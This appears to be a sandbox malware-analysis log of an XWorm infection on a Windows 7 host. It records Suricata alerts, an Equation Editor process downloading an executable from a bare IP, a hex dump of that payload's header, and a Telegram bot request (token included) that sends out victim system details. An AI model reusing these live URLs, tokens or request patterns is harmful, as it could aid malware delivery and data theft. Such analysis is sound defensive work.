Source: global traffic TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
Source: global traffic TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
Source: global traffic TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
Source: global traffic TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
Source: global traffic TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
Source: global traffic TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
Source: global traffic TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
Source: global traffic TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
Source: global traffic TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
Source: global traffic TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
Source: global traffic TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
Source: global traffic TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
Source: global traffic TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
Source: global traffic TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
Source: global traffic TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
Source: global traffic TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
Source: global traffic TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
Source: global traffic TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
Source: global traffic TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
Source: global traffic TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
Source: global traffic TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
Source: global traffic TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
Source: global traffic TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
Source: global traffic TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
Source: global traffic TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
Source: global traffic TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
Source: global traffic TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
Source: global traffic TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
Source: global traffic TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
Source: global traffic TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
Source: global traffic TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
Source: global traffic TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
Source: global traffic TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
Source: global traffic TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
Source: global traffic TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
Source: global traffic TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
Source: global traffic TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
Source: global traffic TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
Source: global traffic TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
Source: global traffic TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
Source: global traffic TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
Source: global traffic TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
Source: global traffic TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
Source: global traffic TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163

Networking

barindex
Source: Network traffic Suricata IDS: 2853193 - Severity 1 - ETPRO MALWARE Win32/XWorm V3 CnC Command - PING Outbound : 192.168.2.22:49173 -> 147.185.221.22:55202
Source: Network traffic Suricata IDS: 2022050 - Severity 1 - ET MALWARE Likely Evil EXE download from dotted Quad by MSXMLHTTP M1 : 66.63.187.123:80 -> 192.168.2.22:49163
Source: Network traffic Suricata IDS: 2022051 - Severity 1 - ET MALWARE Likely Evil EXE download from dotted Quad by MSXMLHTTP M2 : 66.63.187.123:80 -> 192.168.2.22:49163
Source: Network traffic Suricata IDS: 2853685 - Severity 1 - ETPRO MALWARE Win32/XWorm Checkin via Telegram : 192.168.2.22:49164 -> 149.154.167.220:443
Source: Malware configuration extractor URLs: various-wages.gl.at.ply.gg
Source: unknown DNS query: name: api.telegram.org
Source: Yara match File source: 7.2.obibingf24242.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.2.obibingf24242.exe.2665904.6.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.2.obibingf24242.exe.265b624.3.raw.unpack, type: UNPACKEDPE
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 147.185.221.22:55202
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.26.2Date: Wed, 25 Sep 2024 06:30:00 GMTContent-Type: application/x-msdos-programContent-Length: 434176Connection: keep-aliveLast-Modified: Tue, 24 Sep 2024 14:41:49 GMTETag: "6a000-622de8165b3ca"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 99 75 7b be 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 30 00 00 96 06 00 00 08 00 00 00 00 00 00 66 b5 06 00 00 20 00 00 00 c0 06 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 00 07 00 00 02 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 12 b5 06 00 4f 00 00 00 00 c0 06 00 a4 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e0 06 00 0c 00 00 00 b4 a3 06 00 70 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 6c 95 06 00 00 20 00 00 00 96 06 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 a4 05 00 00 00 c0 06 00 00 06 00 00 00 98 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 e0 06 00 00 02 00 00 00 9e 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 46 b5 06 00 00 00 00 00 48 00 00 00 02 00 05 00 b8 3b 00 00 4c 2b 00 00 03 00 00 00 2d 00 00 06 04 67 00 00 b0 3c 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b6 02 73 14 00 00 0a 7d 01 00 00 04 02 73 15 00 00 0a 7d 02 00 00 04 02 14 7d 04 00 00 04 02 28 16 00 00 0a 00 00 02 28 11 00 00 06 00 2a 00 00 13 30 02 00 43 00 00 00 01 00 00 11 00 72 01 00 00 70 28 17 00 00 0a 0a 00 06 0b 16 0c 2b 29 07 08 9a 0d 00 02 7b 01 00 00 04 09 6f 18 00 00 0a 00 02 7b 05 00 00 04 6f 19 00 00 0a 09 6f 1a 00 00 0a 26 00 08 17 58 0c 08 07 8e 69 32 d1 2a 00 13 30 01 00 08 00 00 00 02 00 00 11 00 72 1f 00 00 70 0a 2a 1b 30 05 00 8f 00 00 00 03 00 00 11 00 02 7b 08 00 00 04 6f 1b 00 00 0a 0a 02 7b 07 00 00 04 6f 1b 00 00 0a 0b 02 7b 09 00 00 04 6f 1b 00 00 0a 0c 02 7b 0a 00 00 04 6f 1b 00 00 0a 0d 02 7b 05 00 00 04 6f 1c 00 00 0a 13 04 02 7b 01 00 00 04 11 04 28 01 00 00 2b 13 05 06 28 1e 00 00 0a 07 6f 1f 00 00 0a 08 28 1e 00 00 0a 09 28 20 00 00 0a 11 04 73 2a 00 00 06 13 06 00 02 11 06 28 03 00 00 06 00 00 de 13 13 07 00 11 07 6f 21 00 00 0a 28 22 00 00 0a 26 00 de 00 2a 00 01 10 00 00 00 00 6e 00 0d 7b 00 13 1a
Source: global traffic HTTP traffic detected: GET /bot7503421576:AAFe-HqEJI6A9e-kdWp8RSPiI27fCE4Lw2Q/sendMessage?chat_id=985088883&text=%E2%98%A0%20%5BXWorm%20V5.4%5D%0D%0A%0D%0ANew%20Clinet%20:%20%0D%0A04B2031D7209871FB96E%0D%0A%0D%0AUserName%20:%20user%0D%0AOSFullName%20:%20Microsoft%20Windows%207%20Professional%20%0D%0AUSB%20:%20False%0D%0ACPU%20:%20Error%0D%0AGPU%20:%20Standard%20VGA%20Graphics%20Adapter%20%0D%0ARAM%20:%207.99%20GB%0D%0AGroub%20:%20XWorm%20V5.4 HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
Source: Joe Sandbox View IP Address: 149.154.167.220 149.154.167.220
Source: Joe Sandbox View IP Address: 147.185.221.22 147.185.221.22
Source: Joe Sandbox View ASN Name: TELEGRAMRU TELEGRAMRU
Source: Joe Sandbox View ASN Name: ASN-QUADRANET-GLOBALUS ASN-QUADRANET-GLOBALUS
Source: Joe Sandbox View ASN Name: SALSGIVERUS SALSGIVERUS
Source: Joe Sandbox View JA3 fingerprint: 36f7277af969a6947a61ae0b815907a1
Source: global traffic HTTP traffic detected: GET /txt/vnobizxc.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 66.63.187.123Connection: Keep-Alive
Source: unknown TCP traffic detected without corresponding DNS query: 66.63.187.123
Source: unknown TCP traffic detected without corresponding DNS query: 66.63.187.123
Source: unknown TCP traffic detected without corresponding DNS query: 66.63.187.123
Source: unknown TCP traffic detected without corresponding DNS query: 66.63.187.123
Source: unknown TCP traffic detected without corresponding DNS query: 66.63.187.123
Source: unknown TCP traffic detected without corresponding DNS query: 66.63.187.123
Source: unknown TCP traffic detected without corresponding DNS query: 66.63.187.123
Source: unknown TCP traffic detected without corresponding DNS query: 66.63.187.123
Source: unknown TCP traffic detected without corresponding DNS query: 66.63.187.123
Source: unknown TCP traffic detected without corresponding DNS query: 66.63.187.123
Source: unknown TCP traffic detected without corresponding DNS query: 66.63.187.123
Source: unknown TCP traffic detected without corresponding DNS query: 66.63.187.123
Source: unknown TCP traffic detected without corresponding DNS query: 66.63.187.123
Source: unknown TCP traffic detected without corresponding DNS query: 66.63.187.123
Source: unknown TCP traffic detected without corresponding DNS query: 66.63.187.123
Source: unknown TCP traffic detected without corresponding DNS query: 66.63.187.123
Source: unknown TCP traffic detected without corresponding DNS query: 66.63.187.123
Source: unknown TCP traffic detected without corresponding DNS query: 66.63.187.123
Source: unknown TCP traffic detected without corresponding DNS query: 66.63.187.123
Source: unknown TCP traffic detected without corresponding DNS query: 66.63.187.123
Source: unknown TCP traffic detected without corresponding DNS query: 66.63.187.123
Source: unknown TCP traffic detected without corresponding DNS query: 66.63.187.123
Source: unknown TCP traffic detected without corresponding DNS query: 66.63.187.123
Source: unknown TCP traffic detected without corresponding DNS query: 66.63.187.123
Source: unknown TCP traffic detected without corresponding DNS query: 66.63.187.123
Source: unknown TCP traffic detected without corresponding DNS query: 66.63.187.123
Source: unknown TCP traffic detected without corresponding DNS query: 66.63.187.123
Source: unknown TCP traffic detected without corresponding DNS query: 66.63.187.123
Source: unknown TCP traffic detected without corresponding DNS query: 66.63.187.123
Source: unknown TCP traffic detected without corresponding DNS query: 66.63.187.123
Source: unknown TCP traffic detected without corresponding DNS query: 66.63.187.123
Source: unknown TCP traffic detected without corresponding DNS query: 66.63.187.123
Source: unknown TCP traffic detected without corresponding DNS query: 66.63.187.123
Source: unknown TCP traffic detected without corresponding DNS query: 66.63.187.123
Source: unknown TCP traffic detected without corresponding DNS query: 66.63.187.123
Source: unknown TCP traffic detected without corresponding DNS query: 66.63.187.123
Source: unknown TCP traffic detected without corresponding DNS query: 66.63.187.123
Source: unknown TCP traffic detected without corresponding DNS query: 66.63.187.123
Source: unknown TCP traffic detected without corresponding DNS query: 66.63.187.123
Source: unknown TCP traffic detected without corresponding DNS query: 66.63.187.123
Source: unknown TCP traffic detected without corresponding DNS query: 66.63.187.123
Source: unknown TCP traffic detected without corresponding DNS query: 66.63.187.123
Source: unknown TCP traffic detected without corresponding DNS query: 66.63.187.123
Source: unknown TCP traffic detected without corresponding DNS query: 66.63.187.123
Source: unknown TCP traffic detected without corresponding DNS query: 66.63.187.123
Source: unknown TCP traffic detected without corresponding DNS query: 66.63.187.123
Source: unknown TCP traffic detected without corresponding DNS query: 66.63.187.123
Source: unknown TCP traffic detected without corresponding DNS query: 66.63.187.123
Source: unknown TCP traffic detected without corresponding DNS query: 66.63.187.123
Source: unknown TCP traffic detected without corresponding DNS query: 66.63.187.123
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{CB9F8585-EDEB-411F-9879-C99487259434}.tmp Jump to behavior
Source: global traffic HTTP traffic detected: GET /bot7503421576:AAFe-HqEJI6A9e-kdWp8RSPiI27fCE4Lw2Q/sendMessage?chat_id=985088883&text=%E2%98%A0%20%5BXWorm%20V5.4%5D%0D%0A%0D%0ANew%20Clinet%20:%20%0D%0A04B2031D7209871FB96E%0D%0A%0D%0AUserName%20:%20user%0D%0AOSFullName%20:%20Microsoft%20Windows%207%20Professional%20%0D%0AUSB%20:%20False%0D%0ACPU%20:%20Error%0D%0AGPU%20:%20Standard%20VGA%20Graphics%20Adapter%20%0D%0ARAM%20:%207.99%20GB%0D%0AGroub%20:%20XWorm%20V5.4 HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /txt/vnobizxc.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 66.63.187.123Connection: Keep-Alive
Source: obibingf24242.exe, 00000007.00000002.938006321.0000000005C77000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: www.login.yahoo.com0 equals www.yahoo.com (Yahoo)
Source: global traffic DNS traffic detected: DNS query: api.telegram.org
Source: global traffic DNS traffic detected: DNS query: various-wages.gl.at.ply.gg
Source: EQNEDT32.EXE, EQNEDT32.EXE, 00000002.00000002.420099253.000000000028F000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000002.420099253.00000000002ED000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://66.63.187.123/txt/vnobizxc.exe
Source: EQNEDT32.EXE, 00000002.00000002.420099253.000000000028F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://66.63.187.123/txt/vnobizxc.exeb:
